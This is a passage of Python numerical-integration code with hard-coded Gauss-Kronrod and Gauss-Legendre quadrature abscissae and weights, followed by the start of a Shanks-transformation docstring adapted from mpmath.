[ 0.8295657623827683974428981, 0.0574931562176190664817217],
[ 0.8825605357920526815431165, 0.0484026728305940529029381],
[ 0.9262000474292743258793243, 0.0387991925696270495968019],
[ 0.9600218649683075122168710, 0.0287847078833233693497192],
[ 0.9836681232797472099700326, 0.0184664683110909591423021],
[ 0.9968934840746495402716301, 0.0079681924961666056154659]],
dtype=float),
'k': np.array(
[[-0.9994844100504906375713259, 0.0013890136986770076245516],
[ -0.9968934840746495402716301, 0.0038904611270998840512672],
[ -0.9916309968704045948586284, 0.0066307039159312921733198],
[ -0.9836681232797472099700326, 0.0092732796595177634284411],
[ -0.9731163225011262683746939, 0.0118230152534963417422329],
[ -0.9600218649683075122168710, 0.0143697295070458048124514],
[ -0.9443744447485599794158313, 0.0169208891890532726275723],
[ -0.9262000474292743258793243, 0.0194141411939423811734090],
[ -0.9055733076999077985465226, 0.0218280358216091922971675],
[ -0.8825605357920526815431165, 0.0241911620780806013656864],
[ -0.8572052335460610989586585, 0.0265099548823331016106017],
[ -0.8295657623827683974428981, 0.0287540487650412928439788],
[ -0.7997278358218390830136689, 0.0309072575623877624728843],
[ -0.7677774321048261949179773, 0.0329814470574837260318142],
[ -0.7337900624532268047261711, 0.0349793380280600241374997],
[ -0.6978504947933157969322924, 0.0368823646518212292239111],
[ -0.6600610641266269613700537, 0.0386789456247275929503487],
[ -0.6205261829892428611404776, 0.0403745389515359591119953],
[ -0.5793452358263616917560249, 0.0419698102151642461471475],
[ -0.5366241481420198992641698, 0.0434525397013560693168317],
[ -0.4924804678617785749936931, 0.0448148001331626631923556],
[ -0.4470337695380891767806099, 0.0460592382710069881162717],
[ -0.4004012548303943925354762, 0.0471855465692991539452615],
[ -0.3527047255308781134710372, 0.0481858617570871291407795],
[ -0.3040732022736250773726771, 0.0490554345550297788875282],
[ -0.2546369261678898464398051, 0.0497956834270742063578116],
[ -0.2045251166823098914389577, 0.0504059214027823468408931],
[ -0.1538699136085835469637947, 0.0508817958987496064922975],
[ -0.1028069379667370301470968, 0.0512215478492587721706563],
[ -0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.0000000000000000000000000, 0.0514947294294515675583404],
[ 0.0514718425553176958330252, 0.0514261285374590259338629],
[ 0.1028069379667370301470968, 0.0512215478492587721706563],
[ 0.1538699136085835469637947, 0.0508817958987496064922975],
[ 0.2045251166823098914389577, 0.0504059214027823468408931],
[ 0.2546369261678898464398051, 0.0497956834270742063578116],
[ 0.3040732022736250773726771, 0.0490554345550297788875282],
[ 0.3527047255308781134710372, 0.0481858617570871291407795],
[ 0.4004012548303943925354762, 0.0471855465692991539452615],
[ 0.4470337695380891767806099, 0.0460592382710069881162717],
[ 0.4924804678617785749936931, 0.0448148001331626631923556],
[ 0.5366241481420198992641698, 0.0434525397013560693168317],
[ 0.5793452358263616917560249, 0.0419698102151642461471475],
[ 0.6205261829892428611404776, 0.0403745389515359591119953],
[ 0.6600610641266269613700537, 0.0386789456247275929503487],
[ 0.6978504947933157969322924, 0.0368823646518212292239111],
[ 0.7337900624532268047261711, 0.0349793380280600241374997],
[ 0.7677774321048261949179773, 0.0329814470574837260318142],
[ 0.7997278358218390830136689, 0.0309072575623877624728843],
[ 0.8295657623827683974428981, 0.0287540487650412928439788],
[ 0.8572052335460610989586585, 0.0265099548823331016106017],
[ 0.8825605357920526815431165, 0.0241911620780806013656864],
[ 0.9055733076999077985465226, 0.0218280358216091922971675],
[ 0.9262000474292743258793243, 0.0194141411939423811734090],
[ 0.9443744447485599794158313, 0.0169208891890532726275723],
[ 0.9600218649683075122168710, 0.0143697295070458048124514],
[ 0.9731163225011262683746939, 0.0118230152534963417422329],
[ 0.9836681232797472099700326, 0.0092732796595177634284411],
[ 0.9916309968704045948586284, 0.0066307039159312921733198],
[ 0.9968934840746495402716301, 0.0038904611270998840512672],
[ 0.9994844100504906375713259, 0.0013890136986770076245516]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False], dtype=bool)
},
}
w = weights[n]
dup=w['dup']
xi = w['k'][:,0]
wi1 = np.zeros_like(xi)
wi1[dup] = w['g'][:, 1]
wi2 = w['k'][:,1]
return xi, wi1, wi2
def gauss_legendre_abscissae_and_weights(n):
"""Gauss-Legendre quadrature abscissae and weights
Integral = Sum(f(xi) * wi)
Parameters
----------
n : [2-20, 32, 64, 100]
Number of integration points
Returns
-------
xi, wi : 1d array of len(n)
Abscissae and weights for numericla integration
References
----------
.. [1] Holoborodko, Pavel. 2014. 'Numerical Integration'. Accessed
April 24.
http://www.holoborodko.com/pavel/numerical-methods/numerical-integration/.
"""
if n not in [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
32, 64, 100]:
raise ValueError('n must be 2-20, 32, 64, or 100')
weights = {
2: np.array(
[[-0.5773502691896257645091488, 1.0000000000000000000000000],
[ 0.5773502691896257645091488, 1.0000000000000000000000000]],
dtype=float),
3: np.array(
[[-0.7745966692414833770358531, 0.5555555555555555555555556],
[ 0, 0.8888888888888888888888889],
[ 0.7745966692414833770358531, 0.5555555555555555555555556]],
dtype=float),
4: np.array(
[[-0.8611363115940525752239465, 0.3478548451374538573730639],
[ -0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.3399810435848562648026658, 0.6521451548625461426269361],
[ 0.8611363115940525752239465, 0.3478548451374538573730639]],
dtype=float),
5: np.array(
[[-0.9061798459386639927976269, 0.2369268850561890875142640],
[ -0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0, 0.5688888888888888888888889],
[ 0.5384693101056830910363144, 0.4786286704993664680412915],
[ 0.9061798459386639927976269, 0.2369268850561890875142640]],
dtype=float),
6: np.array(
[[-0.9324695142031520278123016, 0.1713244923791703450402961],
[ -0.6612093864662645136613996, 0.3607615730481386075698335],
[ -0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.2386191860831969086305017, 0.4679139345726910473898703],
[ 0.6612093864662645136613996, 0.3607615730481386075698335],
[ 0.9324695142031520278123016, 0.1713244923791703450402961]],
dtype=float),
7: np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
8: np.array(
[[-0.9602898564975362316835609, 0.1012285362903762591525314],
[ -0.7966664774136267395915539, 0.2223810344533744705443560],
[ -0.5255324099163289858177390, 0.3137066458778872873379622],
[ -0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.1834346424956498049394761, 0.3626837833783619829651504],
[ 0.5255324099163289858177390, 0.3137066458778872873379622],
[ 0.7966664774136267395915539, 0.2223810344533744705443560],
[ 0.9602898564975362316835609, 0.1012285362903762591525314]],
dtype=float),
9: np.array(
[[-0.9681602395076260898355762, 0.0812743883615744119718922],
[ -0.8360311073266357942994298, 0.1806481606948574040584720],
[ -0.6133714327005903973087020, 0.2606106964029354623187429],
[ -0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0, 0.3302393550012597631645251],
[ 0.3242534234038089290385380, 0.3123470770400028400686304],
[ 0.6133714327005903973087020, 0.2606106964029354623187429],
[ 0.8360311073266357942994298, 0.1806481606948574040584720],
[ 0.9681602395076260898355762, 0.0812743883615744119718922]],
dtype=float),
10: np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
11: np.array(
[[-0.9782286581460569928039380, 0.0556685671161736664827537],
[ -0.8870625997680952990751578, 0.1255803694649046246346943],
[ -0.7301520055740493240934163, 0.1862902109277342514260976],
[ -0.5190961292068118159257257, 0.2331937645919904799185237],
[ -0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0, 0.2729250867779006307144835],
[ 0.2695431559523449723315320, 0.2628045445102466621806889],
[ 0.5190961292068118159257257, 0.2331937645919904799185237],
[ 0.7301520055740493240934163, 0.1862902109277342514260976],
[ 0.8870625997680952990751578, 0.1255803694649046246346943],
[ 0.9782286581460569928039380, 0.0556685671161736664827537]],
dtype=float),
12: np.array(
[[-0.9815606342467192506905491, 0.0471753363865118271946160],
[ -0.9041172563704748566784659, 0.1069393259953184309602547],
[ -0.7699026741943046870368938, 0.1600783285433462263346525],
[ -0.5873179542866174472967024, 0.2031674267230659217490645],
[ -0.3678314989981801937526915, 0.2334925365383548087608499],
[ -0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.1252334085114689154724414, 0.2491470458134027850005624],
[ 0.3678314989981801937526915, 0.2334925365383548087608499],
[ 0.5873179542866174472967024, 0.2031674267230659217490645],
[ 0.7699026741943046870368938, 0.1600783285433462263346525],
[ 0.9041172563704748566784659, 0.1069393259953184309602547],
[ 0.9815606342467192506905491, 0.0471753363865118271946160]],
dtype=float),
13: np.array(
[[-0.9841830547185881494728294, 0.0404840047653158795200216],
[ -0.9175983992229779652065478, 0.0921214998377284479144218],
[ -0.8015780907333099127942065, 0.1388735102197872384636018],
[ -0.6423493394403402206439846, 0.1781459807619457382800467],
[ -0.4484927510364468528779129, 0.2078160475368885023125232],
[ -0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0, 0.2325515532308739101945895],
[ 0.2304583159551347940655281, 0.2262831802628972384120902],
[ 0.4484927510364468528779129, 0.2078160475368885023125232],
[ 0.6423493394403402206439846, 0.1781459807619457382800467],
[ 0.8015780907333099127942065, 0.1388735102197872384636018],
[ 0.9175983992229779652065478, 0.0921214998377284479144218],
[ 0.9841830547185881494728294, 0.0404840047653158795200216]],
dtype=float),
14: np.array(
[[-0.9862838086968123388415973, 0.0351194603317518630318329],
[ -0.9284348836635735173363911, 0.0801580871597602098056333],
[ -0.8272013150697649931897947, 0.1215185706879031846894148],
[ -0.6872929048116854701480198, 0.1572031671581935345696019],
[ -0.5152486363581540919652907, 0.1855383974779378137417166],
[ -0.3191123689278897604356718, 0.2051984637212956039659241],
[ -0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.1080549487073436620662447, 0.2152638534631577901958764],
[ 0.3191123689278897604356718, 0.2051984637212956039659241],
[ 0.5152486363581540919652907, 0.1855383974779378137417166],
[ 0.6872929048116854701480198, 0.1572031671581935345696019],
[ 0.8272013150697649931897947, 0.1215185706879031846894148],
[ 0.9284348836635735173363911, 0.0801580871597602098056333],
[ 0.9862838086968123388415973, 0.0351194603317518630318329]],
dtype=float),
15: np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
16: np.array(
[[-0.9894009349916499325961542, 0.0271524594117540948517806],
[ -0.9445750230732325760779884, 0.0622535239386478928628438],
[ -0.8656312023878317438804679, 0.0951585116824927848099251],
[ -0.7554044083550030338951012, 0.1246289712555338720524763],
[ -0.6178762444026437484466718, 0.1495959888165767320815017],
[ -0.4580167776572273863424194, 0.1691565193950025381893121],
[ -0.2816035507792589132304605, 0.1826034150449235888667637],
[ -0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.0950125098376374401853193, 0.1894506104550684962853967],
[ 0.2816035507792589132304605, 0.1826034150449235888667637],
[ 0.4580167776572273863424194, 0.1691565193950025381893121],
[ 0.6178762444026437484466718, 0.1495959888165767320815017],
[ 0.7554044083550030338951012, 0.1246289712555338720524763],
[ 0.8656312023878317438804679, 0.0951585116824927848099251],
[ 0.9445750230732325760779884, 0.0622535239386478928628438],
[ 0.9894009349916499325961542, 0.0271524594117540948517806]],
dtype=float),
17: np.array(
[[-0.9905754753144173356754340, 0.0241483028685479319601100],
[ -0.9506755217687677612227170, 0.0554595293739872011294402],
[ -0.8802391537269859021229557, 0.0850361483171791808835354],
[ -0.7815140038968014069252301, 0.1118838471934039710947884],
[ -0.6576711592166907658503022, 0.1351363684685254732863200],
[ -0.5126905370864769678862466, 0.1540457610768102880814316],
[ -0.3512317634538763152971855, 0.1680041021564500445099707],
[ -0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0, 0.1794464703562065254582656],
[ 0.1784841814958478558506775, 0.1765627053669926463252710],
[ 0.3512317634538763152971855, 0.1680041021564500445099707],
[ 0.5126905370864769678862466, 0.1540457610768102880814316],
[ 0.6576711592166907658503022, 0.1351363684685254732863200],
[ 0.7815140038968014069252301, 0.1118838471934039710947884],
[ 0.8802391537269859021229557, 0.0850361483171791808835354],
[ 0.9506755217687677612227170, 0.0554595293739872011294402],
[ 0.9905754753144173356754340, 0.0241483028685479319601100]],
dtype=float),
18: np.array(
[[-0.9915651684209309467300160, 0.0216160135264833103133427],
[ -0.9558239495713977551811959, 0.0497145488949697964533349],
[ -0.8926024664975557392060606, 0.0764257302548890565291297],
[ -0.8037049589725231156824175, 0.1009420441062871655628140],
[ -0.6916870430603532078748911, 0.1225552067114784601845191],
[ -0.5597708310739475346078715, 0.1406429146706506512047313],
[ -0.4117511614628426460359318, 0.1546846751262652449254180],
[ -0.2518862256915055095889729, 0.1642764837458327229860538],
[ -0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.2518862256915055095889729, 0.1642764837458327229860538],
[ 0.4117511614628426460359318, 0.1546846751262652449254180],
[ 0.5597708310739475346078715, 0.1406429146706506512047313],
[ 0.6916870430603532078748911, 0.1225552067114784601845191],
[ 0.8037049589725231156824175, 0.1009420441062871655628140],
[ 0.8926024664975557392060606, 0.0764257302548890565291297],
[ 0.9558239495713977551811959, 0.0497145488949697964533349],
[ 0.9915651684209309467300160, 0.0216160135264833103133427]],
dtype=float),
19: np.array(
[[-0.9924068438435844031890177, 0.0194617882297264770363120],
[ -0.9602081521348300308527788, 0.0448142267656996003328382],
[ -0.9031559036148179016426609, 0.0690445427376412265807083],
[ -0.8227146565371428249789225, 0.0914900216224499994644621],
[ -0.7209661773352293786170959, 0.1115666455473339947160239],
[ -0.6005453046616810234696382, 0.1287539625393362276755158],
[ -0.4645707413759609457172671, 0.1426067021736066117757461],
[ -0.3165640999636298319901173, 0.1527660420658596667788554],
[ -0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0, 0.1610544498487836959791636],
[ 0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0.3165640999636298319901173, 0.1527660420658596667788554],
[ 0.4645707413759609457172671, 0.1426067021736066117757461],
[ 0.6005453046616810234696382, 0.1287539625393362276755158],
[ 0.7209661773352293786170959, 0.1115666455473339947160239],
[ 0.8227146565371428249789225, 0.0914900216224499994644621],
[ 0.9031559036148179016426609, 0.0690445427376412265807083],
[ 0.9602081521348300308527788, 0.0448142267656996003328382],
[ 0.9924068438435844031890177, 0.0194617882297264770363120]],
dtype=float),
20: np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
32: np.array(
[[-0.9972638618494815635449811, 0.0070186100094700966004071],
[ -0.9856115115452683354001750, 0.0162743947309056706051706],
[ -0.9647622555875064307738119, 0.0253920653092620594557526],
[ -0.9349060759377396891709191, 0.0342738629130214331026877],
[ -0.8963211557660521239653072, 0.0428358980222266806568786],
[ -0.8493676137325699701336930, 0.0509980592623761761961632],
[ -0.7944837959679424069630973, 0.0586840934785355471452836],
[ -0.7321821187402896803874267, 0.0658222227763618468376501],
[ -0.6630442669302152009751152, 0.0723457941088485062253994],
[ -0.5877157572407623290407455, 0.0781938957870703064717409],
[ -0.5068999089322293900237475, 0.0833119242269467552221991],
[ -0.4213512761306353453641194, 0.0876520930044038111427715],
[ -0.3318686022821276497799168, 0.0911738786957638847128686],
[ -0.2392873622521370745446032, 0.0938443990808045656391802],
[ -0.1444719615827964934851864, 0.0956387200792748594190820],
[ -0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.1444719615827964934851864, 0.0956387200792748594190820],
[ 0.2392873622521370745446032, 0.0938443990808045656391802],
[ 0.3318686022821276497799168, 0.0911738786957638847128686],
[ 0.4213512761306353453641194, 0.0876520930044038111427715],
[ 0.5068999089322293900237475, 0.0833119242269467552221991],
[ 0.5877157572407623290407455, 0.0781938957870703064717409],
[ 0.6630442669302152009751152, 0.0723457941088485062253994],
[ 0.7321821187402896803874267, 0.0658222227763618468376501],
[ 0.7944837959679424069630973, 0.0586840934785355471452836],
[ 0.8493676137325699701336930, 0.0509980592623761761961632],
[ 0.8963211557660521239653072, 0.0428358980222266806568786],
[ 0.9349060759377396891709191, 0.0342738629130214331026877],
[ 0.9647622555875064307738119, 0.0253920653092620594557526],
[ 0.9856115115452683354001750, 0.0162743947309056706051706],
[ 0.9972638618494815635449811, 0.0070186100094700966004071]],
dtype=float),
64: np.array(
[[-0.9993050417357721394569056, 0.0017832807216964329472961],
[ -0.9963401167719552793469245, 0.0041470332605624676352875],
[ -0.9910133714767443207393824, 0.0065044579689783628561174],
[ -0.9833362538846259569312993, 0.0088467598263639477230309],
[ -0.9733268277899109637418535, 0.0111681394601311288185905],
[ -0.9610087996520537189186141, 0.0134630478967186425980608],
[ -0.9464113748584028160624815, 0.0157260304760247193219660],
[ -0.9295691721319395758214902, 0.0179517157756973430850453],
[ -0.9105221370785028057563807, 0.0201348231535302093723403],
[ -0.8893154459951141058534040, 0.0222701738083832541592983],
[ -0.8659993981540928197607834, 0.0243527025687108733381776],
[ -0.8406292962525803627516915, 0.0263774697150546586716918],
[ -0.8132653151227975597419233, 0.0283396726142594832275113],
[ -0.7839723589433414076102205, 0.0302346570724024788679741],
[ -0.7528199072605318966118638, 0.0320579283548515535854675],
[ -0.7198818501716108268489402, 0.0338051618371416093915655],
[ -0.6852363130542332425635584, 0.0354722132568823838106931],
[ -0.6489654712546573398577612, 0.0370551285402400460404151],
[ -0.6111553551723932502488530, 0.0385501531786156291289625],
[ -0.5718956462026340342838781, 0.0399537411327203413866569],
[ -0.5312794640198945456580139, 0.0412625632426235286101563],
[ -0.4894031457070529574785263, 0.0424735151236535890073398],
[ -0.4463660172534640879849477, 0.0435837245293234533768279],
[ -0.4022701579639916036957668, 0.0445905581637565630601347],
[ -0.3572201583376681159504426, 0.0454916279274181444797710],
[ -0.3113228719902109561575127, 0.0462847965813144172959532],
[ -0.2646871622087674163739642, 0.0469681828162100173253263],
[ -0.2174236437400070841496487, 0.0475401657148303086622822],
[ -0.1696444204239928180373136, 0.0479993885964583077281262],
[ -0.1214628192961205544703765, 0.0483447622348029571697695],
[ -0.0729931217877990394495429, 0.0485754674415034269347991],
[ -0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0729931217877990394495429, 0.0485754674415034269347991],
[ 0.1214628192961205544703765, 0.0483447622348029571697695],
[ 0.1696444204239928180373136, 0.0479993885964583077281262],
[ 0.2174236437400070841496487, 0.0475401657148303086622822],
[ 0.2646871622087674163739642, 0.0469681828162100173253263],
[ 0.3113228719902109561575127, 0.0462847965813144172959532],
[ 0.3572201583376681159504426, 0.0454916279274181444797710],
[ 0.4022701579639916036957668, 0.0445905581637565630601347],
[ 0.4463660172534640879849477, 0.0435837245293234533768279],
[ 0.4894031457070529574785263, 0.0424735151236535890073398],
[ 0.5312794640198945456580139, 0.0412625632426235286101563],
[ 0.5718956462026340342838781, 0.0399537411327203413866569],
[ 0.6111553551723932502488530, 0.0385501531786156291289625],
[ 0.6489654712546573398577612, 0.0370551285402400460404151],
[ 0.6852363130542332425635584, 0.0354722132568823838106931],
[ 0.7198818501716108268489402, 0.0338051618371416093915655],
[ 0.7528199072605318966118638, 0.0320579283548515535854675],
[ 0.7839723589433414076102205, 0.0302346570724024788679741],
[ 0.8132653151227975597419233, 0.0283396726142594832275113],
[ 0.8406292962525803627516915, 0.0263774697150546586716918],
[ 0.8659993981540928197607834, 0.0243527025687108733381776],
[ 0.8893154459951141058534040, 0.0222701738083832541592983],
[ 0.9105221370785028057563807, 0.0201348231535302093723403],
[ 0.9295691721319395758214902, 0.0179517157756973430850453],
[ 0.9464113748584028160624815, 0.0157260304760247193219660],
[ 0.9610087996520537189186141, 0.0134630478967186425980608],
[ 0.9733268277899109637418535, 0.0111681394601311288185905],
[ 0.9833362538846259569312993, 0.0088467598263639477230309],
[ 0.9910133714767443207393824, 0.0065044579689783628561174],
[ 0.9963401167719552793469245, 0.0041470332605624676352875],
[ 0.9993050417357721394569056, 0.0017832807216964329472961]],
dtype=float),
100: np.array(
[[-0.9997137267734412336782285, 0.0007346344905056717304063],
[ -0.9984919506395958184001634, 0.0017093926535181052395294],
[ -0.9962951347331251491861317, 0.0026839253715534824194396],
[ -0.9931249370374434596520099, 0.0036559612013263751823425],
[ -0.9889843952429917480044187, 0.0046244500634221193510958],
[ -0.9838775407060570154961002, 0.0055884280038655151572119],
[ -0.9778093584869182885537811, 0.0065469484508453227641521],
[ -0.9707857757637063319308979, 0.0074990732554647115788287],
[ -0.9628136542558155272936593, 0.0084438714696689714026208],
[ -0.9539007829254917428493369, 0.0093804196536944579514182],
[ -0.9440558701362559779627747, 0.0103078025748689695857821],
[ -0.9332885350430795459243337, 0.0112251140231859771172216],
[ -0.9216092981453339526669513, 0.0121314576629794974077448],
[ -0.9090295709825296904671263, 0.0130259478929715422855586],
[ -0.8955616449707269866985210, 0.0139077107037187726879541],
[ -0.8812186793850184155733168, 0.0147758845274413017688800],
[ -0.8660146884971646234107400, 0.0156296210775460027239369],
[ -0.8499645278795912842933626, 0.0164680861761452126431050],
[ -0.8330838798884008235429158, 0.0172904605683235824393442],
[ -0.8153892383391762543939888, 0.0180959407221281166643908],
[ -0.7968978923903144763895729, 0.0188837396133749045529412],
[ -0.7776279096494954756275514, 0.0196530874944353058653815],
[ -0.7575981185197071760356680, 0.0204032326462094327668389],
[ -0.7368280898020207055124277, 0.0211334421125276415426723],
[ -0.7153381175730564464599671, 0.0218430024162473863139537],
[ -0.6931491993558019659486479, 0.0225312202563362727017970],
[ -0.6702830156031410158025870, 0.0231974231852541216224889],
[ -0.6467619085141292798326303, 0.0238409602659682059625604],
[ -0.6226088602037077716041908, 0.0244612027079570527199750],
[ -0.5978474702471787212648065, 0.0250575444815795897037642],
[ -0.5725019326213811913168704, 0.0256294029102081160756420],
[ -0.5465970120650941674679943, 0.0261762192395456763423087],
[ -0.5201580198817630566468157, 0.0266974591835709626603847],
[ -0.4932107892081909335693088, 0.0271926134465768801364916],
[ -0.4657816497733580422492166, 0.0276611982207923882942042],
[ -0.4378974021720315131089780, 0.0281027556591011733176483],
[ -0.4095852916783015425288684, 0.0285168543223950979909368],
[ -0.3808729816246299567633625, 0.0289030896011252031348762],
[ -0.3517885263724217209723438, 0.0292610841106382766201190],
[ -0.3223603439005291517224766, 0.0295904880599126425117545],
[ -0.2926171880384719647375559, 0.0298909795933328309168368],
[ -0.2625881203715034791689293, 0.0301622651051691449190687],
[ -0.2323024818449739696495100, 0.0304040795264548200165079],
[ -0.2017898640957359972360489, 0.0306161865839804484964594],
[ -0.1710800805386032748875324, 0.0307983790311525904277139],
[ -0.1402031372361139732075146, 0.0309504788504909882340635],
[ -0.1091892035800611150034260, 0.0310723374275665165878102],
[ -0.0780685828134366366948174, 0.0311638356962099067838183],
[ -0.0468716824215916316149239, 0.0312248842548493577323765],
[ -0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0468716824215916316149239, 0.0312248842548493577323765],
[ 0.0780685828134366366948174, 0.0311638356962099067838183],
[ 0.1091892035800611150034260, 0.0310723374275665165878102],
[ 0.1402031372361139732075146, 0.0309504788504909882340635],
[ 0.1710800805386032748875324, 0.0307983790311525904277139],
[ 0.2017898640957359972360489, 0.0306161865839804484964594],
[ 0.2323024818449739696495100, 0.0304040795264548200165079],
[ 0.2625881203715034791689293, 0.0301622651051691449190687],
[ 0.2926171880384719647375559, 0.0298909795933328309168368],
[ 0.3223603439005291517224766, 0.0295904880599126425117545],
[ 0.3517885263724217209723438, 0.0292610841106382766201190],
[ 0.3808729816246299567633625, 0.0289030896011252031348762],
[ 0.4095852916783015425288684, 0.0285168543223950979909368],
[ 0.4378974021720315131089780, 0.0281027556591011733176483],
[ 0.4657816497733580422492166, 0.0276611982207923882942042],
[ 0.4932107892081909335693088, 0.0271926134465768801364916],
[ 0.5201580198817630566468157, 0.0266974591835709626603847],
[ 0.5465970120650941674679943, 0.0261762192395456763423087],
[ 0.5725019326213811913168704, 0.0256294029102081160756420],
[ 0.5978474702471787212648065, 0.0250575444815795897037642],
[ 0.6226088602037077716041908, 0.0244612027079570527199750],
[ 0.6467619085141292798326303, 0.0238409602659682059625604],
[ 0.6702830156031410158025870, 0.0231974231852541216224889],
[ 0.6931491993558019659486479, 0.0225312202563362727017970],
[ 0.7153381175730564464599671, 0.0218430024162473863139537],
[ 0.7368280898020207055124277, 0.0211334421125276415426723],
[ 0.7575981185197071760356680, 0.0204032326462094327668389],
[ 0.7776279096494954756275514, 0.0196530874944353058653815],
[ 0.7968978923903144763895729, 0.0188837396133749045529412],
[ 0.8153892383391762543939888, 0.0180959407221281166643908],
[ 0.8330838798884008235429158, 0.0172904605683235824393442],
[ 0.8499645278795912842933626, 0.0164680861761452126431050],
[ 0.8660146884971646234107400, 0.0156296210775460027239369],
[ 0.8812186793850184155733168, 0.0147758845274413017688800],
[ 0.8955616449707269866985210, 0.0139077107037187726879541],
[ 0.9090295709825296904671263, 0.0130259478929715422855586],
[ 0.9216092981453339526669513, 0.0121314576629794974077448],
[ 0.9332885350430795459243337, 0.0112251140231859771172216],
[ 0.9440558701362559779627747, 0.0103078025748689695857821],
[ 0.9539007829254917428493369, 0.0093804196536944579514182],
[ 0.9628136542558155272936593, 0.0084438714696689714026208],
[ 0.9707857757637063319308979, 0.0074990732554647115788287],
[ 0.9778093584869182885537811, 0.0065469484508453227641521],
[ 0.9838775407060570154961002, 0.0055884280038655151572119],
[ 0.9889843952429917480044187, 0.0046244500634221193510958],
[ 0.9931249370374434596520099, 0.0036559612013263751823425],
[ 0.9962951347331251491861317, 0.0026839253715534824194396],
[ 0.9984919506395958184001634, 0.0017093926535181052395294],
[ 0.9997137267734412336782285, 0.0007346344905056717304063]],
dtype=float),
}
return weights[n][:,0], weights[n][:,1]
def shanks_table(seq, table=None, randomized=False):
r'''Copied from sympy.mpmath.mpmath.calculus.extrapolation.py
This shanks function is taken almost verbatim (minus an initial ctx
argument???) from sympy.mpmath.mpmath.calculus.extrapolation.py:
- http://docs.sympy.org/dev/modules/mpmath/calculus/sums_limits.html#mpmath.shanks
- https://github.com/sympy/sympy/blob/master/sympy/mpmath/calculus/extrapolation.py
mpmath is BSD license
Notes
-----
Given a list ``seq`` of the first `N` elements of a slowly
convergent infinite sequence `(A_k)`, :func:`~mpmath.shanks` computes the iterated
Shanks transformation `S(A), S(S(A)), \ldots, S^{N/2}(A)`. The Shanks
transformation often provides strong convergence acceleration,
especially if the sequence is oscillating.
The iterated Shanks transformation is computed using the Wynn
epsilon algorithm (see [1]). :func:`~mpmath.shanks` returns the full
epsilon table generated by Wynn's algorithm, which can be read
off as follows:
- The table is a list of lists forming a lower triangular matrix,
where higher row and column indices correspond to more accurate
values.
